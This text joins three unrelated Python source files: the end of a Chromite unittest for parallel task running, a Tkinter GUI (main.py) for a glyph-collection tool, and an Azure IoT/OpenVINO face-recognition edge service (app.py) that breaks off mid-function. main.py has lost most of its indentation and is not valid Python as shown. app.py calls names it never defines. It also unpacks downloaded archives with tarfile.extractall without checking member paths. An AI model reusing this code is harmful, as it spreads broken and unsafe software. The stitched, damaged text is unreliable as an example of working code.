      old_tempdir, old_tempdir_env = osutils.SetGlobalTempDir(new_tempdir)
      try:
        self.testParallelHelloWorld()
      finally:
        # Always restore the process-wide temp dir, even on failure.
        osutils.SetGlobalTempDir(old_tempdir, old_tempdir_env)
def _BackgroundTaskRunnerArgs(results, arg1, arg2, kwarg1=None, kwarg2=None):
  """Helper for TestBackgroundTaskRunnerArgs

  We specifically want a module function to test against and not a class member.
  """
  # Echo every received argument into the results queue so the test can
  # verify positional and keyword plumbing through the task runner.
  results.put((arg1, arg2, kwarg1, kwarg2))
class TestBackgroundTaskRunnerArgs(TestBackgroundWrapper):
  """Unittests for BackgroundTaskRunner argument handling."""

  def testArgs(self):
    """Test that we can pass args down to the task."""
    with parallel.Manager() as manager:
      results = manager.Queue()
      arg2s = set((1, 2, 3))
      with parallel.BackgroundTaskRunner(_BackgroundTaskRunnerArgs, results,
                                         'arg1', kwarg1='kwarg1') as queue:
        for arg2 in arg2s:
          queue.put((arg2,))

      # Since the queue is unordered, need to handle arg2 specially.
      result_arg2s = set()
      for _ in xrange(3):
        result = results.get()
        self.assertEquals(result[0], 'arg1')
        result_arg2s.add(result[1])
        self.assertEquals(result[2], 'kwarg1')
        # kwarg2 was never supplied, so its default must come through.
        self.assertEquals(result[3], None)
      self.assertEquals(arg2s, result_arg2s)
      self.assertEquals(results.empty(), True)
class TestFastPrinting(TestBackgroundWrapper):
  """Stress tests for background sys.stdout handling."""

  def _FastPrinter(self):
    # Writing lots of output quickly often reproduces bugs in this module
    # because it can trigger race conditions.
    for _ in range(_NUM_WRITES - 1):
      sys.stdout.write('x' * _BUFSIZE)
    # Last write is one byte shorter plus a newline, keeping the total at
    # exactly _NUM_WRITES * _BUFSIZE bytes.
    sys.stdout.write('x' * (_BUFSIZE - 1) + '\n')

  def _ParallelPrinter(self):
    parallel.RunParallelSteps([self._FastPrinter] * _NUM_THREADS)

  def _NestedParallelPrinter(self):
    parallel.RunParallelSteps([self._ParallelPrinter])

  def testSimpleParallelPrinter(self):
    out = self.wrapOutputTest(self._ParallelPrinter)
    self.assertEquals(len(out), _TOTAL_BYTES)

  def testNestedParallelPrinter(self):
    """Verify that no output is lost when lots of output is written."""
    out = self.wrapOutputTest(self._NestedParallelPrinter)
    self.assertEquals(len(out), _TOTAL_BYTES)
class TestRunParallelSteps(cros_test_lib.TestCase):
  """Tests for RunParallelSteps."""

  def testReturnValues(self):
    """Test that we pass return values through when requested."""
    def f1():
      return 1
    def f2():
      return 2
    def f3():
      pass

    # Results must come back in step order, with None for a bare return.
    return_values = parallel.RunParallelSteps([f1, f2, f3], return_values=True)
    self.assertEquals(return_values, [1, 2, None])

  def testLargeReturnValues(self):
    """Test that the managed queue prevents hanging on large return values."""
    def f1():
      return ret_value

    # Build a value large enough to exceed an OS pipe buffer.
    ret_value = ''
    for _ in xrange(10000):
      ret_value += 'This will be repeated many times.\n'

    return_values = parallel.RunParallelSteps([f1], return_values=True)
    self.assertEquals(return_values, [ret_value])
class TestParallelMock(TestBackgroundWrapper):
  """Test the ParallelMock class."""

  def setUp(self):
    # Call counter shared with the mocked-in-sequence tasks; this only works
    # because ParallelMock runs everything in this process.
    self._calls = 0

  def _Callback(self):
    self._calls += 1
    return self._calls

  def testRunParallelSteps(self):
    """Make sure RunParallelSteps is mocked out."""
    with ParallelMock():
      parallel.RunParallelSteps([self._Callback])
      self.assertEqual(1, self._calls)

  def testBackgroundTaskRunner(self):
    """Make sure BackgroundTaskRunner is mocked out."""
    with ParallelMock():
      # No inputs queued: the task must never run.
      parallel.RunTasksInProcessPool(self._Callback, [])
      self.assertEqual(0, self._calls)

      result = parallel.RunTasksInProcessPool(self._Callback, [[]])
      self.assertEqual(1, self._calls)
      self.assertEqual([1], result)

      # onexit runs once per process (9 here), on top of zero task calls.
      result = parallel.RunTasksInProcessPool(self._Callback, [], processes=9,
                                              onexit=self._Callback)
      self.assertEqual(10, self._calls)
      self.assertEqual([], result)

      result = parallel.RunTasksInProcessPool(self._Callback, [[]] * 10)
      self.assertEqual(range(11, 21), result)
class TestExceptions(cros_test_lib.MockOutputTestCase):
  """Test cases where child processes raise exceptions."""

  def _SystemExit(self):
    sys.stdout.write(_GREETING)
    sys.exit(1)

  def _KeyboardInterrupt(self):
    sys.stdout.write(_GREETING)
    raise KeyboardInterrupt()

  def _BadPickler(self):
    # Bound methods cannot be pickled, so returning one from a background
    # task forces a pickling failure on the return path.
    return self._BadPickler

  class _TestException(Exception):
    """Custom exception for testing."""

  def _VerifyExceptionRaised(self, fn, exc_type):
    """A helper function to verify the correct |exc_type| is raised."""
    # Exercise both entry points that wrap background failures.
    for task in (lambda: parallel.RunTasksInProcessPool(fn, [[]]),
                 lambda: parallel.RunParallelSteps([fn])):
      output_str = ex_str = ex = None
      with self.OutputCapturer() as capture:
        with self.assertRaises(parallel.BackgroundFailure) as ex:
          task()
        output_str = capture.GetStdout()
      ex_str = str(ex.exception)
      # The original exception type must be preserved inside the wrapper.
      self.assertTrue(exc_type in [x.type for x in ex.exception.exc_infos])
      self.assertEqual(output_str, _GREETING)
      self.assertTrue(str(exc_type) in ex_str)

  def testExceptionRaising(self):
    """Tests the exceptions are raised correctly."""
    self.StartPatcher(BackgroundTaskVerifier())
    self._VerifyExceptionRaised(self._KeyboardInterrupt, KeyboardInterrupt)
    self._VerifyExceptionRaised(self._SystemExit, SystemExit)

  def testExceptionPriority(self):
    """Tests that foreground exceptions take priority over background."""
    self.StartPatcher(BackgroundTaskVerifier())
    with self.assertRaises(self._TestException):
      with parallel.BackgroundTaskRunner(self._KeyboardInterrupt,
                                         processes=1) as queue:
        queue.put([])
        raise self._TestException()

  def testFailedPickle(self):
    """PicklingError should be thrown when an argument fails to pickle."""
    with self.assertRaises(cPickle.PicklingError):
      parallel.RunTasksInProcessPool(self._SystemExit, [[self._SystemExit]])

  def testFailedPickleOnReturn(self):
    """PicklingError should be thrown when a return value fails to pickle."""
    with self.assertRaises(parallel.BackgroundFailure):
      parallel.RunParallelSteps([self._BadPickler], return_values=True)
class _TestForegroundException(Exception):
  """An exception to be raised by the foreground process.

  Used by TestHalting to check that a foreground failure halts background
  tasks without being masked by their errors.
  """
class TestHalting(cros_test_lib.MockOutputTestCase, TestBackgroundWrapper):
  """Test that child processes are halted when exceptions occur."""

  def setUp(self):
    # Cross-process flags used by the _Pass/_Fail/_Exit step helpers.
    self.failed = multiprocessing.Event()
    self.passed = multiprocessing.Event()

  def _GetKillChildrenTimeout(self):
    """Return a timeout that is long enough for _BackgroundTask._KillChildren.

    This unittest is not meant to restrict which signal succeeds in killing the
    background process, so use a long enough timeout whenever asserting that the
    background process is killed, keeping buffer for slow builders.
    """
    return (parallel._BackgroundTask.SIGTERM_TIMEOUT +
            parallel._BackgroundTask.SIGKILL_TIMEOUT) + 30

  def _Pass(self):
    self.passed.set()
    sys.stdout.write(_GREETING)

  def _Exit(self):
    # Wait for _Pass to run first, then exit non-zero to trigger the halt.
    sys.stdout.write(_GREETING)
    self.passed.wait()
    sys.exit(1)

  def _Fail(self):
    # Must be killed before the timeout elapses; setting self.failed would
    # mean the halt machinery did not stop this step.
    self.failed.wait(self._GetKillChildrenTimeout())
    self.failed.set()

  def _PassEventually(self):
    self.passed.wait(self._GetKillChildrenTimeout())
    self.passed.set()

  @unittest.skipIf(_SKIP_FLAKY_TESTS, 'Occasionally fails.')
  def testExceptionRaising(self):
    """Test that exceptions halt all running steps."""
    steps = [self._Exit, self._Fail, self._Pass, self._Fail]
    output_str, ex_str = None, None
    with self.OutputCapturer() as capture:
      try:
        parallel.RunParallelSteps(steps, halt_on_error=True)
      except parallel.BackgroundFailure as ex:
        output_str = capture.GetStdout()
        ex_str = str(ex)
        logging.debug(ex_str)
    self.assertTrue('Traceback' in ex_str)
    self.assertTrue(self.passed.is_set())
    self.assertEqual(output_str, _GREETING)
    # The _Fail steps must have been killed before setting the flag.
    self.assertFalse(self.failed.is_set())

  def testForegroundExceptionRaising(self):
    """Test that BackgroundTaskRunner halts tasks on a foreground exception."""
    with self.assertRaises(_TestForegroundException):
      with parallel.BackgroundTaskRunner(self._PassEventually,
                                         processes=1,
                                         halt_on_error=True) as queue:
        queue.put([])
        raise _TestForegroundException()
    self.assertFalse(self.passed.is_set())

  @unittest.skipIf(_SKIP_FLAKY_TESTS, 'Occasionally fails.')
  def testTempFileCleanup(self):
    """Test that all temp files are cleaned up."""
    with osutils.TempDir() as tempdir:
      self.assertEqual(os.listdir(tempdir), [])
      self.testExceptionRaising()
      self.assertEqual(os.listdir(tempdir), [])

  def testKillQuiet(self, steps=None, **kwargs):
    """Test that processes do get killed if they're silent for too long."""
    if steps is None:
      steps = [self._Fail] * 2
    # Shrink every timeout so the silent-kill path triggers quickly.
    kwargs.setdefault('SILENT_TIMEOUT', 0.1)
    kwargs.setdefault('MINIMUM_SILENT_TIMEOUT', 0.01)
    kwargs.setdefault('SILENT_TIMEOUT_STEP', 0)
    kwargs.setdefault('SIGTERM_TIMEOUT', 0.1)
    kwargs.setdefault('PRINT_INTERVAL', 0.01)
    # 'detach' keeps gdb from hanging onto the dying process.
    kwargs.setdefault('GDB_COMMANDS', ('detach',))

    ex_str = None
    with mock.patch.multiple(parallel._BackgroundTask, **kwargs):
      with self.OutputCapturer() as capture:
        try:
          with cros_test_lib.LoggingCapturer():
            parallel.RunParallelSteps(steps)
        except parallel.BackgroundFailure as ex:
          ex_str = str(ex)
      error_str = capture.GetStderr()
    # The stack dump from the killed child names this file.
    self.assertTrue('parallel_unittest.py' in error_str)
    self.assertTrue(ex_str)
class TestConstants(cros_test_lib.TestCase):
  """Test values of constants."""

  def testSilentTimeout(self):
    """Verify the silent timeout is small enough."""
    # Enforce that the default timeout is less than 9000, the default timeout
    # set in build/scripts/master/factory/chromeos_factory.py:ChromiteFactory
    # in the Chrome buildbot source code.
    self.assertLess(
        parallel._BackgroundTask.SILENT_TIMEOUT, 9000,
        'Do not increase this timeout. Instead, print regular progress '
        'updates, so that buildbot (and cbuildbot) will will know that your '
        'program has not hung.')
class TestExitWithParent(cros_test_lib.TestCase):
  """Tests ExitWithParent."""

  def testChildExits(self):
    """Create a child and a grandchild. The child should die with the parent."""
    def GrandChild():
      # Arm the die-with-parent behavior, then outlive any reasonable test
      # duration unless it fires.
      parallel.ExitWithParent()
      time.sleep(9)

    def Child(queue):
      grand_child = multiprocessing.Process(target=GrandChild)
      grand_child.start()
      queue.put(grand_child.pid)
      time.sleep(9)

    with parallel.Manager() as manager:
      q = manager.Queue()
      child = multiprocessing.Process(target=lambda: Child(q))
      child.start()
      grand_child_pid = q.get(timeout=1)

      # Before we kill the child, the grandchild should be running:
      self.assertTrue(os.path.isdir('/proc/%d' % grand_child_pid))
      os.kill(child.pid, signal.SIGKILL)
      # (shortly) after we kill the child, the grandchild should kill itself.
      # We can't use os.waitpid because the grandchild process is not a child
      # process of ours. Just wait 20 seconds - this should be enough even if the
      # machine is under load.
      # BUG FIX: wait until the grandchild's /proc entry *disappears*. The
      # original polled os.path.isdir(...) directly, which is True immediately
      # and made this wait (and the test's whole point) vacuous.
      timeout_util.WaitForReturnTrue(
          lambda: not os.path.isdir('/proc/%d' % grand_child_pid),
          20,
          period=0.05)
def main(_argv):
  """Entry point: run this module's unittests via cros_test_lib."""
  cros_test_lib.main(level='info', module=__name__)
|
main.py
|
from Tkinter import *
import tkFileDialog
import tkMessageBox
import threading
from glyphcollector.collection_handler import CollectionHandler
from tools import AverageCalculator, count_images, listFolderPaths
class App:
def __init__( self, parent ):
self.stateVar = "Ready"
self.collectionHandler = CollectionHandler( )
self.averageCalculator = AverageCalculator( )
self.root = parent
self.root.title( "GlyphCollector" )
self.root.createcommand( 'tkAboutDialog', self.showAbout )
self.root.after( 50, self.updateStateLabel )
self.root.protocol( 'WM_DELETE_WINDOW', self.killProcessAndQuit )
self.collectionThread = None
self.avgThread = None
self.stateLabelVar = StringVar( )
self.stateLabelVar.set( self.stateVar )
self.scans_path_selected = False
self.templates_path_selected = False
self.output_path_selected = False
self.scanpathentry = None
self.templatespathentry = None
self.outputpathentry = None
self.scansPathVar = StringVar( )
self.templatesPathVar = StringVar( )
self.outputPathVar = StringVar( )
self.init_widgets( )
def showAbout( self ):
info = "GlyphCollector was written by Gabor Kerekes"
tkMessageBox.showinfo( "About", info )
def init_widgets( self ):
def scrollToEnd( entry ):
entry.icursor( END )
entry.xview_moveto( 1.0 )
topFrame = Frame( self.root )
bottomFrame = Frame( self.root )
statusFrame = Frame( self.root, bg='grey' )
topFrame.grid( column=0, row=0, padx=20, pady=20, sticky=W )
bottomFrame.grid( column=0, row=1, padx=20, pady=20, sticky=W )
statusFrame.grid( column=0, row=2, sticky=W + E + S )
############ SCANS ##############
Label( topFrame, text="Scans directory:" ).grid( row=0, column=0, sticky=W )
self.scanpathentry = Entry( topFrame, bg="grey", width=50, textvariable=self.scansPathVar )
self.scanpathentry.grid( padx=3, row=0, column=2, sticky=W )
Button( topFrame, text="...", command=self.select_scans_path ).grid( row=0, column=3, sticky=W )
############ TEMPLATES ##############
Label( topFrame, text="Templates directory:" ).grid( row=1, column=0, sticky=W )
self.templatespathentry = Entry( topFrame, bg="grey", width=50, textvariable=self.templatesPathVar )
self.templatespathentry.grid( padx=3, row=1, column=2, sticky=W )
Button( topFrame, text="...", command=self.select_templates_path ).grid( row=1, column=3, sticky=W )
############ OUTPUT ##############
Label( topFrame, text="Output directory:" ).grid( row=2, column=0, sticky=W )
self.outputpathentry = Entry( topFrame, bg="grey", width=50, textvariable=self.outputPathVar )
self.outputpathentry.grid( padx=3, row=2, column=2, sticky=W )
Button( topFrame, text="...", command=self.select_output_path ).grid( row=2, column=3, sticky=W )
Checkbutton( topFrame, text="Test run", command=self.collectionHandler.toggleTestRun ) \
.grid( row=3, column=0, sticky=W, pady=10 )
############ CONTROL ##############
Button( bottomFrame, text="Collect Glyphs", command=self.init_collection_process ) \
.grid( row=0, column=0, sticky=W + E )
Button( bottomFrame, text="Calculate Averages", command=self.init_average_calculation_process ) \
.grid( row=0, column=1, sticky=W + E )
Button( bottomFrame, text="Cancel", command=self.killProcess ) \
.grid( row=0, column=2, sticky=W + E )
############ STATUS ##############
Label( statusFrame, text="Status:", bg='grey', ).grid( row=0, column=0, sticky=W, pady=5, padx=20 )
Label( statusFrame, textvariable=self.stateLabelVar, bg='grey', justify=LEFT ) \
.grid( row=0, column=1 )
def updateStateLabel( self ):
if self.collectionThread and self.collectionThread.isAlive( ):
self.stateLabelVar.set( self.collectionHandler.stateVar )
elif self.avgThread and self.avgThread.isAlive( ):
self.stateLabelVar.set( self.averageCalculator.stateVar )
else:
self.stateLabelVar.set( "Ready" )
self.root.after( 50, self.updateStateLabel )
def select_scans_path( self ):
dirname = tkFileDialog.askdirectory( parent=self.root, title="select scans directory", mustexist=False )
if dirname:
self.scans_path_selected = True
self.scansPathVar.set( dirname )
print 'scans directory:', dirname
self.scanpathentry.xview_moveto( 1.0 )
def select_templates_path( self ):
dirname = tkFileDialog.askdirectory(
parent=self.root,
title="select templates directory",
mustexist=False )
if dirname:
self.templates_path_selected = True
self.templatesPathVar.set( dirname )
print 'templates directory:', dirname
self.templatespathentry.xview_moveto( 1.0 )
def select_output_path( self ):
dirname = tkFileDialog.askdirectory(
parent=self.root,
title="select output directory",
mustexist=False )
if dirname:
self.output_path_selected = True
self.outputPathVar.set( dirname )
print 'output directory:', dirname
self.outputpathentry.xview_moveto( 1.0 )
def init_collection_process( self ):
    """Validate the directory selections and start glyph collection.

    All three paths must be set and both the scans and templates
    folders must contain at least one image; otherwise an error
    dialog is shown and nothing is started.
    """
    scansPath = self.scansPathVar.get( )
    templatesPath = self.templatesPathVar.get( )
    outputPath = self.outputPathVar.get( )
    if scansPath and templatesPath and outputPath:
        self.collectionHandler.set_output_path( outputPath )
        if count_images( scansPath ) > 0:
            self.collectionHandler.set_scans_dirpath( scansPath )
            if count_images( templatesPath ) > 0:
                self.collectionHandler.set_templates_dirpath( templatesPath )
                # run collection on a worker thread so the UI stays responsive
                self.collectionThread = threading.Thread( target=self.collectionHandler.run )
                self.collectionThread.start( )
            else:
                tkMessageBox.showerror( "Error", "The templates folder doesn't seem to contain any JPEGs." )
        else:
            tkMessageBox.showerror( "Error", "The scans folder doesn't seem to contain any JPEGs." )
    else:
        tkMessageBox.showerror( "Error", "Please specify all folders." )
def init_average_calculation_process( self ):
    """Start average calculation on the collected output, if possible.

    Refuses to start while the collection thread is alive; requires the
    output folder to be set and to contain collection results.
    """
    if not self.collectionThread or not self.collectionThread.isAlive( ):
        outputPath = self.outputPathVar.get( )
        if outputPath:
            if listFolderPaths( outputPath ):
                self.averageCalculator.setFolderPath( outputPath )
                # run averaging on a worker thread so the UI stays responsive
                self.avgThread = threading.Thread( target=self.averageCalculator.run )
                self.avgThread.start( )
            else:
                tkMessageBox.showerror( "Error",
                    "In order to calculate averages, the 'Output directory' needs to contain the results of the collection process." )
        else:
            tkMessageBox.showerror( "Error", "Please specify the output folder." )
    else:
        print "collection is running"
def killProcess( self ):
    """Ask whichever worker thread is currently alive to stop.

    Sets the worker's cooperative ``stop`` flag and switches its state
    string to "Stopped"; the worker is expected to notice the flag and
    exit on its own.
    """
    collection_alive = self.collectionThread and self.collectionThread.isAlive( )
    if collection_alive:
        self.collectionHandler.stateVar = "Stopped"
        self.collectionHandler.stop = True
        return
    if self.avgThread and self.avgThread.isAlive( ):
        self.averageCalculator.stateVar = "Stopped"
        self.averageCalculator.stop = True
def killProcessAndQuit( self ):
    """Stop any running worker, then leave the Tk main loop."""
    self.killProcess( )
    self.root.quit( )
def main( ):
    """Build the Tk root window, attach the App, and run the event loop."""
    root = Tk( )
    App( root )
    # fixed-size window: the grid layout is not designed to reflow
    root.resizable( 0, 0 )
    root.mainloop( )

# Guard the entry point: previously main() ran unconditionally, which
# launched the GUI as a side effect of merely importing this module.
if __name__ == '__main__':
    main( )
|
app.py
|
import threading
from PIL import Image
import os
import io
import json
import logging
import linecache
import sys
import datetime
import asyncio
from argparse import ArgumentParser
import cv2
import numpy as np
from openvino.inference_engine import IECore
from flask import Flask, request, jsonify, Response
from file_uploader import FileUploader
from object_detector import ObjectDetector
from face_recognizer import FaceRecognizer
from iot_client import IoTClient, IoTModuleClient, IoTDeviceClient
import requests
import tarfile
from six.moves import input
# from azure.iot.device import IoTHubModuleClient
# Runtime configuration shared between the twin-update handler and the
# HTTP routes; mutated under configLock in parse_desired_properties_request.
intervalSec = 60         # minimum seconds between uploaded snapshot images
inferenceMark = False    # draw inference rectangles on uploaded frames
sendDetection = False    # emit detection telemetry messages to IoT Hub
modelLoaded = False      # True once both OD and FR models loaded successfully
FACEDB_FOLDER_NAME = None  # face-database folder; set from env/CLI in main()
def update_reported_properties_of_loaded_model(client, od_model, fr_fd_model, fr_lm_model, fr_reid_model, fr_ag_model):
    """Report the loaded model file names via the device twin.

    ``fr_ag_model`` (age/gender model) is optional; when absent it is
    reported as the string 'none'.

    Bugfix: the original condition was ``if fr_ag_model:``, which
    overwrote a real model name with 'none' and left a missing one as
    None — the test must fire when the name is falsy, not truthy.
    """
    if not fr_ag_model:
        fr_ag_model = 'none'
    current_status = {"loaded_models": {'od':od_model, 'fr_fd':fr_fd_model, 'fr_lm':fr_lm_model, 'fr_reid':fr_reid_model, 'fr_ag':fr_ag_model }}
    client.patch_twin_reported_properties(current_status)
def update_reported_properties_of_ipaddress(client, ipaddress):
    """Report the module's current IP address via the device twin."""
    client.patch_twin_reported_properties({'ipaddress': ipaddress})
def downloadModelsFile(modelUrl, modelFileName, modelFolderName):
    """Download a model archive into *modelFolderName*.

    The HTTP body is saved as *modelFileName*; when the name ends with
    '.tgz' the archive is extracted in place and the tarball removed.

    Returns the absolute folder path on success, or None when the HTTP
    request did not return 200.
    """
    modelFolderPath = None
    response = requests.get(modelUrl)
    if response.status_code == 200:
        os.makedirs(modelFolderName, exist_ok=True)
        saveFileName = os.path.join(modelFolderName, modelFileName)
        with open(saveFileName, 'wb') as saveFile:
            saveFile.write(response.content)
        logging.info('Succeeded to download new model.')
        if modelFileName.endswith('.tgz'):
            # context manager closes the tar handle deterministically
            # (the original leaked it, which can hold the fd open)
            with tarfile.open(saveFileName, 'r:gz') as tar:
                tar.extractall(modelFolderName)
            os.remove(saveFileName)
        modelFolderPath = os.path.join(os.getcwd(), modelFolderName)
    else:
        logging.info(f'Failed to download {modelUrl}')
    return modelFolderPath
def parse_desired_properties_request(client, configSpec, od, fr, configLock):
    """Apply a twin desired-properties document to the running service.

    Updates the telemetry/upload settings (under ``configLock``) and,
    unless models were already loaded this run, downloads and loads the
    object-detection ('model-od') and face-recognition ('model-fr')
    models described in *configSpec*, finally reporting the loaded
    model names back through *client* (when provided).
    """
    sendKey = 'send-telemetry'
    global sendDetection, modelLoaded
    if sendKey in configSpec:
        configLock.acquire()
        sendDetection = bool(configSpec[sendKey])
        configLock.release()
        logging.info(f'new send detection telemetry = {sendDetection}')
    uploadImageKey = 'upload'
    global intervalSec, inferenceMark
    if uploadImageKey in configSpec:
        configLock.acquire()
        if 'interval-sec' in configSpec[uploadImageKey]:
            intervalSec = int(configSpec[uploadImageKey]['interval-sec'])
        if 'inference-mark' in configSpec[uploadImageKey]:
            inferenceMark = bool(configSpec[uploadImageKey]['inference-mark'])
        configLock.release()
        logging.info(f'new interval-sec = {intervalSec}')
        logging.info(f'new inference-mark = {inferenceMark}')
    # AI models: only load once per process; later patches are deferred
    if modelLoaded:
        logging.info('Model update will be done at next starting.')
        return
    odModelName = None
    fdModelName = None
    lmModelName = None
    reidModelName = None
    odModelLoaded = False
    frModelLoaded = False
    odModelFileKey = 'model-od'
    if odModelFileKey in configSpec:
        modelUrl = configSpec[odModelFileKey]['url']
        modelFileName = configSpec[odModelFileKey]['filename']
        odModelName = configSpec[odModelFileKey]['name']
        odLabelName = configSpec[odModelFileKey]['label']
        odArchType = configSpec[odModelFileKey]['architecture-type']
        modelFolderPath = os.path.join(os.getcwd(), odModelFileKey)
        modelPath = os.path.join(modelFolderPath, odModelName)
        labelPath = os.path.join(modelFolderPath, odLabelName)
        logging.info(f'Receive request of object detection model update - Model:{odModelName}, Label:{odLabelName}, ArchitectureType:{odArchType} - {modelUrl}')
        # skip the download when both files are already on disk
        if os.path.exists(modelPath) and os.path.exists(labelPath):
            logging.info(f'Model:{odModelName} and Labels:{odLabelName} has been downloaded.')
        else:
            logging.info(f'Loading {modelFileName}...')
            modelFolderPath = downloadModelsFile(modelUrl,modelFileName,odModelFileKey)
            modelPath = os.path.join(modelFolderPath, odModelName)
            labelPath = os.path.join(modelFolderPath, odLabelName)
        # hold the lock so the HTTP routes never score a half-loaded model
        configLock.acquire()
        res = od.LoadModel(modelPath, labelPath, odArchType)
        configLock.release()
        if res == 0:
            logging.info('object detection model load succeeded')
            odModelLoaded = True
    global FACEDB_FOLDER_NAME
    frModelFileKey = 'model-fr'
    if frModelFileKey in configSpec:
        modelUrl = configSpec[frModelFileKey]['url']
        modelFileName = configSpec[frModelFileKey]['filename']
        fdModelName = configSpec[frModelFileKey]['fd-name']
        lmModelName = configSpec[frModelFileKey]['lm-name']
        reidModelName = configSpec[frModelFileKey]['reid-name']
        logging.info(f'Receive request of face recognition model update - {modelFileName} - {modelUrl}')
        # optional age/gender model
        agModelName = None
        if 'ag-name' in configSpec[frModelFileKey]:
            agModelName = configSpec[frModelFileKey]['ag-name']
        modelFolderPath = os.path.join(os.getcwd(), frModelFileKey)
        fdModelPath = os.path.join(modelFolderPath, fdModelName)
        lmModelPath = os.path.join(modelFolderPath, lmModelName)
        reidModelPath = os.path.join(modelFolderPath, reidModelName)
        agModelPath = None
        if agModelName:
            agModelPath = os.path.join(modelFolderPath, agModelName)
            logging.info(f'Use {agModelName} as age gender detection.')
        if os.path.exists(fdModelPath) and os.path.exists(lmModelPath) and os.path.exists(reidModelPath):
            logging.info(f'FD Model:{fdModelName}, LM Model:{lmModelName}, REID Model:{reidModelName} have been downloaded.')
        else:
            logging.info(f'Loading {modelFileName}...')
            modelFolderPath = downloadModelsFile(modelUrl,modelFileName,frModelFileKey)
            fdModelPath = os.path.join(modelFolderPath, fdModelName)
            lmModelPath = os.path.join(modelFolderPath, lmModelName)
            reidModelPath = os.path.join(modelFolderPath, reidModelName)
            if agModelName:
                agModelPath = os.path.join(modelFolderPath, agModelName)
        if 'face-db' in configSpec:
            faceDBSpec = configSpec['face-db']
            faceDBUrl = faceDBSpec['url']
            faceDBFileName = faceDBSpec['filename']
            logging.info(f'faced-db file is {faceDBFileName}, extract to {FACEDB_FOLDER_NAME}')
            folderPath = downloadModelsFile(faceDBUrl, faceDBFileName, FACEDB_FOLDER_NAME)
        configLock.acquire()
        res = fr.LoadModel(fdModelPath, lmModelPath, reidModelPath, agModelPath)
        configLock.release()
        if res == 0:
            logging.info('face recognition model load succeeded')
            frModelLoaded = True
    modelLoaded = odModelLoaded and frModelLoaded
    # NOTE(review): agModelName is only bound inside the 'model-fr'
    # branch; the guard below reaches it only when fdModelName was set,
    # which implies that branch ran — confirm this invariant holds.
    if odModelName and fdModelName and lmModelName and reidModelName and client:
        update_reported_properties_of_loaded_model(client, odModelName, fdModelName, lmModelName, reidModelName, agModelName)
def twin_patch_handler(patch):
    """Callback invoked when twin desired properties are patched.

    NOTE(review): ``client`` and ``configLock`` are not defined at
    module scope (both live inside main()), so calling this function
    as-is raises NameError — confirm the intended wiring before use.
    """
    logging.info(f'Twin desired properties patch updated. - {patch}')
    parse_desired_properties_request(client, patch, None, None, configLock)
def twin_update_listener(client, configLock):
    """Blocking loop: receive twin desired-properties patches and apply them.

    Kept for reference — setup_iot() registers a patch handler instead
    of spawning this listener thread (the spawn code there is commented
    out). Removed an unused ``global intervalSec, inferenceMark``
    declaration; this function never touches either name.
    """
    while True:
        patch = client.receive_twin_desired_properties_patch()  # blocking call
        logging.info(f'Twin desired properties patch updated. - {patch}')
        parse_desired_properties_request(client, patch, None, None, configLock)
def setup_iot(edgeDeviceId, od, fr, configLock, cs):
    """Create and connect the IoT client, then apply the current twin.

    Runs as an IoT Edge module when *edgeDeviceId* is set, as a device
    app when a connection string *cs* is given, and returns None (test
    mode) when neither is provided. On success the connected client is
    returned with a desired-properties patch handler registered.

    Raises: re-raises any exception from client construction/connection
    after logging it.
    """
    if not edgeDeviceId and not cs:
        logging.info('This execution may be test.')
        return None
    try:
        global inferenceMark, intervalSec
        if not sys.version >= "3.5.3":
            raise Exception( "The sample requires python 3.5.3+. Current version of Python: %s" % sys.version )
        logging.info( "IoT Hub Client for Python" )
        iotClient = None
        if edgeDeviceId:
            # The client object is used to interact with your Azure IoT hub.
            iotClient = IoTModuleClient()
            logging.info('Initialized as IoT Edge Module.')
        elif cs:
            iotClient = IoTDeviceClient(cs)
            logging.info('Initialized as IoT Device App')
        if iotClient:
            # connect the client.
            iotClient.connect()
            logging.info("Connected to Edge Runtime.")
            # apply the desired properties that are already on the twin
            currentTwin = iotClient.get_twin()
            configSpec = currentTwin['desired']
            parse_desired_properties_request(iotClient, configSpec, od, fr, configLock)
            iotClient.receive_twin_desired_properties_patch_handler(parse_desired_properties_request, configLock)
            # twin_update_listener_thread = threading.Thread(target=twin_update_listener, args=(iotClient, configLock))
            # twin_update_listener_thread.daemon = True
            # twin_update_listener_thread.start()
        logging.info('IoT Edge or Device settings done.')
        return iotClient
    except Exception as e:
        logging.warning( "Unexpected error %s " % e )
        raise
# Configure the root logger once at import time (INFO level).
logging.basicConfig(level=logging.INFO)
def build_argparser():
    """Build the CLI parser used when running outside IoT Edge.

    Option groups mirror the twin desired-properties schema: general
    runtime settings, IoT Hub connectivity, the object-detection model
    spec, and the face-recognition model spec.
    """
    ap = ArgumentParser()

    group = ap.add_argument_group('General')
    group.add_argument('-pg', '--pg', required=False, help='Required. Folder path of Face DB.')
    group.add_argument('-d', '--device', required=False, help='Required. should be CPU | GPU | MYRIAD | HETERO | HDDL')
    group.add_argument('-m', '--inference_mask', default=False, required=False, action='store_true', help='Optional. Mark Inference raectangle on a frame.')

    group = ap.add_argument_group('IoT Hub')
    group.add_argument('-cs', '--connection_string', required=False)
    group.add_argument('-opod', '--output_path_od', required=False)
    group.add_argument('-opfr', '--output_path_fr', required=False)

    group = ap.add_argument_group('Object Detection')
    group.add_argument('-ou', '--od_url', required=False, help='Required. Specify url of object detection tgz file.')
    group.add_argument('-of', '--od_filename', required=False, help='Required. Specify file name of the tgz file.')
    group.add_argument('-on', '--od_name', required=False, help='Required. Specify file name of object detection model.')
    group.add_argument('-ol', '--od_label', required=False, help='Required. Specify file name of object detection labels.')
    group.add_argument('-oa', '--od_architecture_type', required=False, help='Required. Specify architecture type of the object detection model. should be ssd | ctpn | yolo | yolov4 | faceboxes | centernet | retinaface | ultra_lightweight_face_detection | retinaface-pytorch')

    group = ap.add_argument_group('Face Recognition')
    group.add_argument('-fu', '--fr_url', required=False, help='Required. Specify url of face recoginition tgz file.')
    group.add_argument('-ff', '--fr_filename', required=False, help='Required. Specify file name of the tgz file.')
    group.add_argument('-fd', '--fr_fd_name', required=False, help='Required. Specify file name of face detection model.')
    group.add_argument('-fl', '--fr_lm_name', required=False, help='Required. Specify file name landmark detection model.')
    group.add_argument('-fr', '--fr_reid_name', required=False, help='Required. Specify file name of face recognition model.')

    return ap
def pil2cv(image):
    """Convert a PIL image (or array-like) to an OpenCV-ordered ndarray.

    Grayscale input is returned as-is (uint8); 3-channel input is
    reordered RGB->BGR and 4-channel input RGBA->BGRA.
    """
    cvimg = np.array(image, dtype=np.uint8)
    if cvimg.ndim == 2:
        # single-channel: no channel reordering required
        return cvimg
    channels = cvimg.shape[2]
    if channels == 3:
        cvimg = cv2.cvtColor(cvimg, cv2.COLOR_RGB2BGR)
    elif channels == 4:
